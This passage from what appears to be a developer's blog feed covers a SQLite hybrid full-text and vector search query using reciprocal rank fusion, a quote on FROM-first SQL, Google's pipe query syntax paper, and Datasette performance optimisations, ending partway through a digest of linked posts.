    row_number() over (&lt;span class="pl-k"&gt;order by&lt;/span&gt; rank) &lt;span class="pl-k"&gt;as&lt;/span&gt; rank_number,
    rank &lt;span class="pl-k"&gt;as&lt;/span&gt; score
  &lt;span class="pl-k"&gt;from&lt;/span&gt; fts_articles
  &lt;span class="pl-k"&gt;where&lt;/span&gt; headline match :query
  &lt;span class="pl-k"&gt;limit&lt;/span&gt; :k
),
&lt;span class="pl-c"&gt;&lt;span class="pl-c"&gt;--&lt;/span&gt; combine FTS5 + vector search results with RRF&lt;/span&gt;
final &lt;span class="pl-k"&gt;as&lt;/span&gt; (
  &lt;span class="pl-k"&gt;select&lt;/span&gt;
    &lt;span class="pl-c1"&gt;articles&lt;/span&gt;.&lt;span class="pl-c1"&gt;id&lt;/span&gt;,
    &lt;span class="pl-c1"&gt;articles&lt;/span&gt;.&lt;span class="pl-c1"&gt;headline&lt;/span&gt;,
    &lt;span class="pl-c1"&gt;vec_matches&lt;/span&gt;.&lt;span class="pl-c1"&gt;rank_number&lt;/span&gt; &lt;span class="pl-k"&gt;as&lt;/span&gt; vec_rank,
    &lt;span class="pl-c1"&gt;fts_matches&lt;/span&gt;.&lt;span class="pl-c1"&gt;rank_number&lt;/span&gt; &lt;span class="pl-k"&gt;as&lt;/span&gt; fts_rank,
    &lt;span class="pl-c"&gt;&lt;span class="pl-c"&gt;--&lt;/span&gt; RRF algorithm&lt;/span&gt;
    (
      coalesce(&lt;span class="pl-c1"&gt;1&lt;/span&gt;.&lt;span class="pl-c1"&gt;0&lt;/span&gt; &lt;span class="pl-k"&gt;/&lt;/span&gt; (:rrf_k &lt;span class="pl-k"&gt;+&lt;/span&gt; &lt;span class="pl-c1"&gt;fts_matches&lt;/span&gt;.&lt;span class="pl-c1"&gt;rank_number&lt;/span&gt;), &lt;span class="pl-c1"&gt;0&lt;/span&gt;.&lt;span class="pl-c1"&gt;0&lt;/span&gt;) &lt;span class="pl-k"&gt;*&lt;/span&gt; :weight_fts &lt;span class="pl-k"&gt;+&lt;/span&gt;
      coalesce(&lt;span class="pl-c1"&gt;1&lt;/span&gt;.&lt;span class="pl-c1"&gt;0&lt;/span&gt; &lt;span class="pl-k"&gt;/&lt;/span&gt; (:rrf_k &lt;span class="pl-k"&gt;+&lt;/span&gt; &lt;span class="pl-c1"&gt;vec_matches&lt;/span&gt;.&lt;span class="pl-c1"&gt;rank_number&lt;/span&gt;), &lt;span class="pl-c1"&gt;0&lt;/span&gt;.&lt;span class="pl-c1"&gt;0&lt;/span&gt;) &lt;span class="pl-k"&gt;*&lt;/span&gt; :weight_vec
    ) &lt;span class="pl-k"&gt;as&lt;/span&gt; combined_rank,
    &lt;span class="pl-c1"&gt;vec_matches&lt;/span&gt;.&lt;span class="pl-c1"&gt;distance&lt;/span&gt; &lt;span class="pl-k"&gt;as&lt;/span&gt; vec_distance,
    &lt;span class="pl-c1"&gt;fts_matches&lt;/span&gt;.&lt;span class="pl-c1"&gt;score&lt;/span&gt; &lt;span class="pl-k"&gt;as&lt;/span&gt; fts_score
  &lt;span class="pl-k"&gt;from&lt;/span&gt; fts_matches
  full outer &lt;span class="pl-k"&gt;join&lt;/span&gt; vec_matches &lt;span class="pl-k"&gt;on&lt;/span&gt; &lt;span class="pl-c1"&gt;vec_matches&lt;/span&gt;.&lt;span class="pl-c1"&gt;article_id&lt;/span&gt; &lt;span class="pl-k"&gt;=&lt;/span&gt; &lt;span class="pl-c1"&gt;fts_matches&lt;/span&gt;.&lt;span class="pl-c1"&gt;rowid&lt;/span&gt;
  &lt;span class="pl-k"&gt;join&lt;/span&gt; articles &lt;span class="pl-k"&gt;on&lt;/span&gt; &lt;span class="pl-c1"&gt;articles&lt;/span&gt;.&lt;span class="pl-c1"&gt;rowid&lt;/span&gt; &lt;span class="pl-k"&gt;=&lt;/span&gt; coalesce(&lt;span class="pl-c1"&gt;fts_matches&lt;/span&gt;.&lt;span class="pl-c1"&gt;rowid&lt;/span&gt;, &lt;span class="pl-c1"&gt;vec_matches&lt;/span&gt;.&lt;span class="pl-c1"&gt;article_id&lt;/span&gt;)
  &lt;span class="pl-k"&gt;order by&lt;/span&gt; combined_rank &lt;span class="pl-k"&gt;desc&lt;/span&gt;
)
&lt;span class="pl-k"&gt;select&lt;/span&gt; &lt;span class="pl-k"&gt;*&lt;/span&gt; &lt;span class="pl-k"&gt;from&lt;/span&gt; final;&lt;/pre&gt;&lt;/div&gt;

&lt;p&gt;I’ve been puzzled in the past over how to best do that because the distance scores from vector similarity and the relevance scores from FTS are meaningless in comparison to each other. RRF doesn’t even attempt to compare them - it uses them purely for &lt;code&gt;row_number()&lt;/code&gt; ranking within each set and combines the results based on that.


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/full-text-search"&gt;full-text-search&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/search"&gt;search&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sql"&gt;sql&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sqlite"&gt;sqlite&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/alex-garcia"&gt;alex-garcia&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/vector-search"&gt;vector-search&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/embeddings"&gt;embeddings&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/rag"&gt;rag&lt;/a&gt;&lt;/p&gt;



</summary><category term="full-text-search"/><category term="search"/><category term="sql"/><category term="sqlite"/><category term="alex-garcia"/><category term="vector-search"/><category term="embeddings"/><category term="rag"/></entry><entry><title>Quoting D. Richard Hipp</title><link href="https://simonwillison.net/2024/Aug/28/d-richard-hipp/#atom-tag" rel="alternate"/><published>2024-08-28T22:30:28+00:00</published><updated>2024-08-28T22:30:28+00:00</updated><id>https://simonwillison.net/2024/Aug/28/d-richard-hipp/#atom-tag</id><summary type="html">
    &lt;blockquote cite="https://sqlite.org/forum/forumpost/2d2720461b82f2fd"&gt;&lt;p&gt;My goal is to keep SQLite relevant and viable through the year 2050. That's a long time from now. If I knew that standard SQL was not going to change any between now and then, I'd go ahead and make non-standard extensions that allowed for FROM-clause-first queries, as that seems like a useful extension. The problem is that standard SQL will &lt;em&gt;not&lt;/em&gt; remain static. Probably some future version of "standard SQL" will support some kind of FROM-clause-first query format. I need to ensure that whatever SQLite supports will be compatible with the standard, whenever it drops. And the only way to do that is to support nothing until after the standard appears.&lt;/p&gt;
&lt;p&gt;When will that happen? A month? A year? Ten years? Who knows.&lt;/p&gt;
&lt;p&gt;I'll probably take my cue from PostgreSQL. If PostgreSQL adds support for FROM-clause-first queries, then I'll do the same with SQLite, copying the PostgreSQL syntax. Until then, I'm afraid you are stuck with only traditional SELECT-first queries in SQLite.&lt;/p&gt;&lt;/blockquote&gt;
&lt;p class="cite"&gt;&amp;mdash; &lt;a href="https://sqlite.org/forum/forumpost/2d2720461b82f2fd"&gt;D. Richard Hipp&lt;/a&gt;&lt;/p&gt;

    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/d-richard-hipp"&gt;d-richard-hipp&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sql"&gt;sql&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/postgresql"&gt;postgresql&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sqlite"&gt;sqlite&lt;/a&gt;&lt;/p&gt;



</summary><category term="d-richard-hipp"/><category term="sql"/><category term="postgresql"/><category term="sqlite"/></entry><entry><title>SQL Has Problems. We Can Fix Them: Pipe Syntax In SQL</title><link href="https://simonwillison.net/2024/Aug/24/pipe-syntax-in-sql/#atom-tag" rel="alternate"/><published>2024-08-24T23:00:01+00:00</published><updated>2024-08-24T23:00:01+00:00</updated><id>https://simonwillison.net/2024/Aug/24/pipe-syntax-in-sql/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://research.google/pubs/sql-has-problems-we-can-fix-them-pipe-syntax-in-sql/"&gt;SQL Has Problems. We Can Fix Them: Pipe Syntax In SQL&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
A new paper from Google Research describing custom syntax for analytical SQL queries that has been rolling out inside Google since February, reaching 1,600 "seven-day-active users" by August 2024.&lt;/p&gt;
&lt;p&gt;A key idea is here is to fix one of the biggest usability problems with standard SQL: the order of the clauses in a query. Starting with &lt;code&gt;SELECT&lt;/code&gt; instead of &lt;code&gt;FROM&lt;/code&gt; has always been confusing, see &lt;a href="https://jvns.ca/blog/2019/10/03/sql-queries-don-t-start-with-select/"&gt;SQL queries don't start with SELECT&lt;/a&gt; by Julia Evans.&lt;/p&gt;
&lt;p&gt;Here's an example of the new alternative syntax, taken from the &lt;a href="https://github.com/google/zetasql/blob/2024.08.2/docs/pipe-syntax.md"&gt;Pipe query syntax documentation&lt;/a&gt; that was added to Google's open source &lt;a href="https://github.com/google/zetasql"&gt;ZetaSQL&lt;/a&gt; project last week.&lt;/p&gt;
&lt;p&gt;For this SQL query:&lt;/p&gt;
&lt;div class="highlight highlight-source-sql"&gt;&lt;pre&gt;&lt;span class="pl-k"&gt;SELECT&lt;/span&gt; component_id, &lt;span class="pl-c1"&gt;COUNT&lt;/span&gt;(&lt;span class="pl-k"&gt;*&lt;/span&gt;)
&lt;span class="pl-k"&gt;FROM&lt;/span&gt; ticketing_system_table
&lt;span class="pl-k"&gt;WHERE&lt;/span&gt;
  &lt;span class="pl-c1"&gt;assignee_user&lt;/span&gt;.&lt;span class="pl-c1"&gt;email&lt;/span&gt; &lt;span class="pl-k"&gt;=&lt;/span&gt; &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;'&lt;/span&gt;username@email.com&lt;span class="pl-pds"&gt;'&lt;/span&gt;&lt;/span&gt;
  &lt;span class="pl-k"&gt;AND&lt;/span&gt; status &lt;span class="pl-k"&gt;IN&lt;/span&gt; (&lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;'&lt;/span&gt;NEW&lt;span class="pl-pds"&gt;'&lt;/span&gt;&lt;/span&gt;, &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;'&lt;/span&gt;ASSIGNED&lt;span class="pl-pds"&gt;'&lt;/span&gt;&lt;/span&gt;, &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;'&lt;/span&gt;ACCEPTED&lt;span class="pl-pds"&gt;'&lt;/span&gt;&lt;/span&gt;)
&lt;span class="pl-k"&gt;GROUP BY&lt;/span&gt; component_id
&lt;span class="pl-k"&gt;ORDER BY&lt;/span&gt; component_id &lt;span class="pl-k"&gt;DESC&lt;/span&gt;;&lt;/pre&gt;&lt;/div&gt;

&lt;p&gt;The Pipe query alternative would look like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;FROM ticketing_system_table
|&amp;gt; WHERE
    assignee_user.email = 'username@email.com'
    AND status IN ('NEW', 'ASSIGNED', 'ACCEPTED')
|&amp;gt; AGGREGATE COUNT(*)
   GROUP AND ORDER BY component_id DESC;
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;The Google Research paper is released as a two-column PDF. I &lt;a href="https://news.ycombinator.com/item?id=41339138"&gt;snarked about this&lt;/a&gt; on Hacker News: &lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Google: you are a web company. Please learn to publish your research papers as web pages.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;This remains a long-standing pet peeve of mine. PDFs like this are horrible to read on mobile phones, hard to copy-and-paste from, have poor accessibility (see &lt;a href="https://fedi.simonwillison.net/@simon/113017908957136345"&gt;this Mastodon conversation&lt;/a&gt;) and are generally just &lt;em&gt;bad citizens&lt;/em&gt; of the web.&lt;/p&gt;
&lt;p&gt;Having complained about this I felt compelled to see if I could address it myself. Google's own Gemini Pro 1.5 model can process PDFs, so I uploaded the PDF to &lt;a href="https://aistudio.google.com/"&gt;Google AI Studio&lt;/a&gt; and prompted the &lt;code&gt;gemini-1.5-pro-exp-0801&lt;/code&gt; model like this:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Convert this document to neatly styled semantic HTML&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;This worked &lt;em&gt;surprisingly well&lt;/em&gt;. It output HTML for about half the document and then stopped, presumably hitting the output length limit, but a follow-up prompt of "and the rest" caused it to continue from where it stopped and run until the end.&lt;/p&gt;
&lt;p&gt;Here's the result (with a banner I added at the top explaining that it's a conversion): &lt;a href="https://static.simonwillison.net/static/2024/Pipe-Syntax-In-SQL.html"&gt;Pipe-Syntax-In-SQL.html&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;I haven't compared the two completely, so I can't guarantee there are no omissions or mistakes.&lt;/p&gt;
&lt;p&gt;The figures from the PDF aren't present - Gemini Pro output tags like &lt;code&gt;&amp;lt;img src="figure1.png" alt="Figure 1: SQL syntactic clause order doesn't match semantic evaluation order. (From [25].)"&amp;gt;&lt;/code&gt; but did nothing to help me create those images.&lt;/p&gt;
&lt;p&gt;Amusingly the document ends with &lt;code&gt;&amp;lt;p&amp;gt;(A long list of references, which I won't reproduce here to save space.)&amp;lt;/p&amp;gt;&lt;/code&gt; rather than actually including the references from the paper!&lt;/p&gt;
&lt;p&gt;So this isn't a perfect solution, but considering it took just the first prompt I could think of it's a very promising start. I expect someone willing to spend more than the couple of minutes I invested in this could produce a very useful HTML alternative version of the paper with the assistance of Gemini Pro.&lt;/p&gt;
&lt;p&gt;One last amusing note: I posted a link to this &lt;a href="https://news.ycombinator.com/item?id=41339238"&gt;to Hacker News&lt;/a&gt; a few hours ago. Just now when I searched Google for the exact title of the paper my HTML version was already the third result!&lt;/p&gt;
&lt;p&gt;I've now added a &lt;code&gt;&amp;lt;meta name="robots" content="noindex, follow"&amp;gt;&lt;/code&gt; tag to the top of the HTML to keep this unverified &lt;a href="https://simonwillison.net/tags/slop/"&gt;AI slop&lt;/a&gt; out of their search index. This is a good reminder of how much better HTML is than PDF for sharing information on the web!

    &lt;p&gt;&lt;small&gt;&lt;/small&gt;Via &lt;a href="https://news.ycombinator.com/item?id=41338877"&gt;Hacker News&lt;/a&gt;&lt;/small&gt;&lt;/p&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/google"&gt;google&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/pdf"&gt;pdf&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/seo"&gt;seo&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sql"&gt;sql&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/julia-evans"&gt;julia-evans&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/gemini"&gt;gemini&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/slop"&gt;slop&lt;/a&gt;&lt;/p&gt;



</summary><category term="google"/><category term="pdf"/><category term="seo"/><category term="sql"/><category term="ai"/><category term="julia-evans"/><category term="generative-ai"/><category term="llms"/><category term="gemini"/><category term="slop"/></entry><entry><title>Optimizing Datasette (and other weeknotes)</title><link href="https://simonwillison.net/2024/Aug/22/optimizing-datasette/#atom-tag" rel="alternate"/><published>2024-08-22T15:46:43+00:00</published><updated>2024-08-22T15:46:43+00:00</updated><id>https://simonwillison.net/2024/Aug/22/optimizing-datasette/#atom-tag</id><summary type="html">
    &lt;p&gt;I've been working with Alex Garcia on an experiment involving using &lt;a href="https://datasette.io/"&gt;Datasette&lt;/a&gt; to explore FEC contributions. We currently have a 11GB SQLite database - trivial for SQLite to handle, but at the upper end of what I've comfortably explored with Datasette in the past.&lt;/p&gt;
&lt;p&gt;This was just the excuse I needed to dig into some optimizations! The next Datasette alpha release will feature some significant speed improvements for working with large tables - they're available on the &lt;code&gt;main&lt;/code&gt; branch already.&lt;/p&gt;
&lt;h3 id="datasette-tracing"&gt;Datasette tracing&lt;/h3&gt;
&lt;p&gt;Datasette has had a &lt;code&gt;?_trace=1&lt;/code&gt; feature for a while. It's only available if you run Datasette with the &lt;code&gt;trace_debug&lt;/code&gt; setting enabled - which you can do like this:&lt;/p&gt;
&lt;div class="highlight highlight-source-shell"&gt;&lt;pre&gt;datasette -s trace_debug 1 mydatabase.db&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Then any request with &lt;code&gt;?_trace=1&lt;/code&gt; added to the URL will return a JSON blob at the end of the page showing every SQL query that was executed, how long it took and a truncated stack trace showing the code that triggered it.&lt;/p&gt;
&lt;p&gt;Scroll to the bottom of &lt;a href="https://latest.datasette.io/fixtures?_trace=1"&gt;https://latest.datasette.io/fixtures?_trace=1&lt;/a&gt; for an example.&lt;/p&gt;
&lt;p&gt;The JSON isn't very pretty. &lt;a href="https://datasette.io/plugins/datasette-pretty-traces"&gt;datasette-pretty-traces&lt;/a&gt; is a plugin I built to fix that - it turns that JSON into a much nicer visual representation.&lt;/p&gt;
&lt;p&gt;As I dug into tracing I found a nasty bug in the trace mechanism. It was meant to quietly give up on pages longer than 256KB, in order to avoid having to spool potentially megabytes of data into memory rather than streaming it to the client. That code had a bug: the user would get a blank page instead! &lt;a href="https://github.com/simonw/datasette/issues/2404"&gt;I fixed that first&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;The next problem was that SQL queries that terminated with an error - including the crucial "query interrupted" error raised when a query took longer than the Datasette configured time limit - were not being included in the trace. That's &lt;a href="https://github.com/simonw/datasette/issues/2405"&gt;fixed too&lt;/a&gt;, and I &lt;a href="https://github.com/simonw/datasette-pretty-traces/issues/8"&gt;upgraded datasette-pretty-traces&lt;/a&gt; to render those errors with a pink background:&lt;/p&gt;
&lt;p&gt;&lt;img src="https://static.simonwillison.net/static/2024/datasette-pretty-traces-error.jpg" alt="Screenshot showing the new UI - a select * from no_table query is highlighted in pink and has an expanded box with information about where that call was made in the Python code and how long it took. Other queries show a bar indicating how long they took to run." style="max-width: 100%;" /&gt;&lt;/p&gt;
&lt;p&gt;This gave me all the information I needed to track down those other performance problems.&lt;/p&gt;
&lt;h4 id="rule-of-thumb-don-t-scan-more-than-10-000-rows"&gt;Rule of thumb: don't scan more than 10,000 rows&lt;/h4&gt;
&lt;p&gt;SQLite is fast, but you can still run into performance problems if you ask it to scan too many rows.&lt;/p&gt;
&lt;p&gt;Going forward, I'm introducing a new target for Datasette development: never scan more than 10,000 rows without a user explicitly requesting that scan.&lt;/p&gt;
&lt;p&gt;The most common time this happens is with a &lt;code&gt;select count(*)&lt;/code&gt; query. Datasette likes to display the number of rows in a table, and when you run a SQL query it likes to show you how many total rows match even when only displaying a subset of them in the paginated interface.&lt;/p&gt;
&lt;p&gt;These counts are shown in two key places: on the list of tables in a database, and on the table view itself.&lt;/p&gt;
&lt;p&gt;Counts are protected by Datasette's query time limit mechanism. On the table listing page this was configured such that if a count takes longer than 5ms it would be skipped and "Many rows" would be displayed. It turns out this mechanism isn't as reliable as I had hoped, maybe due to the overhead of cancelling the query. Given enough large tables those cancelled count queries could still add up to user-visible latency problems on that page.&lt;/p&gt;
&lt;p&gt;Here's the pattern I turned to that fixed the performance problem:&lt;/p&gt;
&lt;div class="highlight highlight-source-sql"&gt;&lt;pre&gt;&lt;span class="pl-k"&gt;select&lt;/span&gt; &lt;span class="pl-c1"&gt;count&lt;/span&gt;(&lt;span class="pl-k"&gt;*&lt;/span&gt;) &lt;span class="pl-k"&gt;from&lt;/span&gt; (
    &lt;span class="pl-k"&gt;select&lt;/span&gt; &lt;span class="pl-k"&gt;*&lt;/span&gt; &lt;span class="pl-k"&gt;from&lt;/span&gt; libfec_SA16 &lt;span class="pl-k"&gt;limit&lt;/span&gt; &lt;span class="pl-c1"&gt;10001&lt;/span&gt;
)&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;This nested query first limits the table to 10,001 rows, then counts them. If the count is less than 10,001 we know that the count is entirely accurate. If it's exactly 10,001 we can show "&amp;gt;10,000 rows" in the UI.&lt;/p&gt;
&lt;p&gt;Capping the number of scanned rows to 10,000 for any of these counts makes a &lt;em&gt;huge&lt;/em&gt; difference in the performance of these pages!&lt;/p&gt;
&lt;p&gt;But what about those table pages? Showing "&amp;gt;10,000 rows" is a bit of a cop-out, especially if the question the user wants to answer is "how many rows are in this table / match this filter?"&lt;/p&gt;
&lt;p&gt;I addressed that in &lt;a href="https://github.com/simonw/datasette/issues/2408"&gt;issue #2408&lt;/a&gt;: Datasette still truncates the count at 10,000 on initial page load, but users now get a "count all" link they can click to execute the full count.&lt;/p&gt;
&lt;p&gt;The link goes to a SQL query page that runs the query, but I've also added a bit of progressive enhancement JavaScript to run that query and update the page in-place when the link is clicked. Here's what that looks like:&lt;/p&gt;
&lt;p&gt;&lt;img src="https://static.simonwillison.net/static/2024/datasette-count.gif" alt="Animated demo - the pgae shows  /&gt;10,000 rows with a count all link. Clicking that replaces it with the text counting... which then replaces the entire count text with 23,036,621 rows." style="max-width: 100%;" /&gt;&lt;/p&gt;
&lt;p&gt;In the future I may add various caching mechanisms so that counts that have been calculated can be displayed elsewhere in the UI without having to re-run the expensive queries. I may also incorporate SQL triggers for updating exact denormalized counts in a &lt;code&gt;_counts&lt;/code&gt; table, &lt;a href="https://sqlite-utils.datasette.io/en/stable/python-api.html#python-api-cached-table-counts"&gt;as implemented in sqlite-utils&lt;/a&gt;.&lt;/p&gt;
&lt;h4 id="optimized-facet-suggestions"&gt;Optimized facet suggestions&lt;/h4&gt;
&lt;p&gt;The other feature that was really hurting performance was facet suggestions.&lt;/p&gt;
&lt;p&gt;Datasette &lt;a href="https://docs.datasette.io/en/latest/facets.html"&gt;Facets&lt;/a&gt; are a really powerful way to quickly explore data. They can be applied to any column by the user, but to make the feature more visible Datasette suggests facets that might be a good fit for the current table by looking for things like columns that only contain 3 unique values.&lt;/p&gt;
&lt;p&gt;The suggestion code was designed with performance in mind - it uses tight time limits (governed by the &lt;a href="https://docs.datasette.io/en/latest/settings.html#facet-suggest-time-limit-ms"&gt;facet_suggest_time_limit_ms&lt;/a&gt; setting, defaulting to 50ms) and attempts to use other SQL tricks to quickly decide if a facet should be considered or not.&lt;/p&gt;
&lt;p&gt;I found a couple of tricks to dramatically speed these up against larger tables as well.&lt;/p&gt;
&lt;p&gt;First, I've started enforcing that new 10,000 limit for facet suggestions too - so each suggestion query only considers a maximum of 10,000 rows, even on tables with millions of items. These suggestions are just suggestions, so seeing a recommendation  that would not have been suggested if the full table had been scanned is a reasonable trade-off.&lt;/p&gt;
&lt;p&gt;Secondly, I spotted &lt;a href="https://github.com/simonw/datasette/issues/2407"&gt;a gnarly bug&lt;/a&gt; in the way the date facet suggestion works. The previous query looked like this:&lt;/p&gt;
&lt;div class="highlight highlight-source-sql"&gt;&lt;pre&gt;&lt;span class="pl-k"&gt;select&lt;/span&gt; &lt;span class="pl-k"&gt;date&lt;/span&gt;(column_to_test) &lt;span class="pl-k"&gt;from&lt;/span&gt; ( 
    &lt;span class="pl-k"&gt;select&lt;/span&gt; &lt;span class="pl-k"&gt;*&lt;/span&gt; &lt;span class="pl-k"&gt;from&lt;/span&gt; mytable
)
&lt;span class="pl-k"&gt;where&lt;/span&gt; column_to_test glob &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;????-??-*&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt;
&lt;span class="pl-k"&gt;limit&lt;/span&gt; &lt;span class="pl-c1"&gt;100&lt;/span&gt;;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;That &lt;code&gt;limit 100&lt;/code&gt; was meant to restrict it to considering 100 rows... but that didn't actually work! If a table with 20 million columns in had NO rows that matched the glob pattern, the query would still scan all 20 million rows.&lt;/p&gt;
&lt;p&gt;The new query looks like this, and fixes the problem:&lt;/p&gt;
&lt;div class="highlight highlight-source-sql"&gt;&lt;pre&gt;&lt;span class="pl-k"&gt;select&lt;/span&gt; &lt;span class="pl-k"&gt;date&lt;/span&gt;(column_to_test) &lt;span class="pl-k"&gt;from&lt;/span&gt; ( 
    &lt;span class="pl-k"&gt;select&lt;/span&gt; &lt;span class="pl-k"&gt;*&lt;/span&gt; &lt;span class="pl-k"&gt;from&lt;/span&gt; mytable &lt;span class="pl-k"&gt;limit&lt;/span&gt; &lt;span class="pl-c1"&gt;100&lt;/span&gt;
)
&lt;span class="pl-k"&gt;where&lt;/span&gt; column_to_test glob &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;????-??-*&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Moving the limit to the inner query causes the SQL to only run against the first 100 rows, as intended.&lt;/p&gt;
&lt;p&gt;Thanks to these optimizations running Datasette against a database with huge tables now feels snappy and responsive. Expect them in an alpha release soon.&lt;/p&gt;
&lt;h4 id="on-the-blog"&gt;On the blog&lt;/h4&gt;
&lt;p&gt;I'm trying something new for the rest of my weeknotes. Since I'm investing a lot more effort in my link blog, I'm including a digest of everything I've linked to since the last edition. I &lt;a href="https://observablehq.com/@simonw/weeknotes"&gt;updated my weeknotes Observable notebook&lt;/a&gt; to help generate these, after &lt;a href="https://gist.github.com/simonw/d7f4f2950b426839f36713ed0ecf8c5d"&gt;prompting Claude&lt;/a&gt; to help prototype a bunch of different approaches.&lt;/p&gt;
&lt;p&gt;The following section was generated by this code - it includes everything I've posted, grouped by the most "interesting" tag assigned to each post. I'll likely iterate on this a bunch more in the future.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;openai&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;a href="https://simonwillison.net/2024/Aug/6/openai-structured-outputs"&gt;OpenAI: Introducing Structured Outputs in the API&lt;/a&gt; - 2024-08-06&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://simonwillison.net/2024/Aug/8/gpt-4o-system-card"&gt;GPT-4o System Card&lt;/a&gt; - 2024-08-08&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://simonwillison.net/2024/Aug/11/sqlite-vec"&gt;Using sqlite-vec with embeddings in sqlite-utils and Datasette&lt;/a&gt; - 2024-08-11&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;javascript&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;a href="https://simonwillison.net/2024/Aug/6/observable-plot-waffle-mark"&gt;Observable Plot: Waffle mark&lt;/a&gt; - 2024-08-06&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://simonwillison.net/2024/Aug/18/reckoning"&gt;Reckoning&lt;/a&gt; - 2024-08-18&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;python&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;a href="https://simonwillison.net/2024/Aug/6/cibuildwheel"&gt;cibuildwheel 2.20.0 now builds Python 3.13 wheels by default&lt;/a&gt; - 2024-08-06&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://simonwillison.net/2024/Aug/8/django-http-debug"&gt;django-http-debug, a new Django app mostly written by Claude&lt;/a&gt; - 2024-08-08&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://simonwillison.net/2024/Aug/11/pep-750"&gt;PEP 750 – Tag Strings For Writing Domain-Specific Languages&lt;/a&gt; - 2024-08-11&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://simonwillison.net/2024/Aug/13/mlx-whisper"&gt;mlx-whisper&lt;/a&gt; - 2024-08-13&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://simonwillison.net/2024/Aug/17/python-m-pytest"&gt;Upgrading my cookiecutter templates to use python -m pytest&lt;/a&gt; - 2024-08-17&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://simonwillison.net/2024/Aug/20/writing-your-pyproject-toml"&gt;Writing your pyproject.toml&lt;/a&gt; - 2024-08-20&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://simonwillison.net/2024/Aug/20/uv-unified-python-packaging"&gt;uv: Unified Python packaging&lt;/a&gt; - 2024-08-20&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://simonwillison.net/2024/Aug/21/usrbinenv-uv-run"&gt;#!/usr/bin/env -S uv run&lt;/a&gt; - 2024-08-21&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://simonwillison.net/2024/Aug/21/armin-ronacher"&gt;Armin Ronacher: There is an elephant in the room which is that As...&lt;/a&gt; - 2024-08-21&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://simonwillison.net/2024/Aug/22/light-the-torch"&gt;light-the-torch&lt;/a&gt; - 2024-08-22&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;security&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;a href="https://simonwillison.net/2024/Aug/7/google-ai-studio-data-exfiltration-demo"&gt;Google AI Studio data exfiltration demo&lt;/a&gt; - 2024-08-07&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://simonwillison.net/2024/Aug/12/smuggling-queries-at-the-protocol-level"&gt;SQL Injection Isn't Dead: Smuggling Queries at the Protocol Level&lt;/a&gt; - 2024-08-12&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://simonwillison.net/2024/Aug/14/living-off-microsoft-copilot"&gt;Links and materials for Living off Microsoft Copilot&lt;/a&gt; - 2024-08-14&lt;/li&gt;
&lt;li&gt;
